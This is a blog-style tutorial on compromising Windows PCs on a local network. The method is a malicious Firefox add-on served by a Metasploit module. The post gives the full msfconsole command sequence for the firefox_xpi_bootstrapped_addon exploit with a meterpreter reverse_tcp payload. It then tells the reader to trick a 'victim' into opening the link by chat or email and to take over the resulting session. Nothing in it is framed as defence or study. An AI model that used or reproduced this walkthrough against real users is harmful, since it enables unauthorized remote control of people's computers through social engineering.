How to Exploit Windows 7 PC in LAN Attacking on Mozilla Firefox

Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution

This exploit dynamically creates an .xpi addon file. The resulting bootstrapped Firefox addon is presented to the victim via a web page with. The victim’s Firefox browser will pop a dialog asking if they trust the addon. Once the user clicks “install”, the addon is installed and executes the payload with full user permissions. As of Firefox 4, this will work without a restart as the addon is marked to be “bootstrapped”. As the addon will execute the payload after each Firefox restart, an option can be given to automatically uninstall the addon once the payload has been executed.

Exploit Targets

Windows XP service pack 2

Windows XP service pack 3

Windows 7

All versions of Mozilla Firefox

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/firefox_xpi_bootstrapped_addon

Msf exploit (firefox_xpi_bootstrapped_addon)>set payload windows/meterpreter/reverse_tcp

Msf exploit (firefox_xpi_bootstrapped_addon)>set lhost 192.168.1.2 (IP of Local Host)

Msf exploit (firefox_xpi_bootstrapped_addon)>set srvhost 192.168.1.2 (This must be an address on the local machine)

Msf exploit (firefox_xpi_bootstrapped_addon)>set uripath newaddon (The Url to use for this exploit)

Msf exploit (firefox_xpi_bootstrapped_addon)>set target 1

Msf exploit (firefox_xpi_bootstrapped_addon)>exploit

Now an URL you should give to your victim http://192.168.1.2:8080/newaddon

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

3 Comments How to Exploit Windows 7 PC in LAN Attacking on Mozilla Firefox

Leave a Reply

Your email address will not be published. Required fields are marked *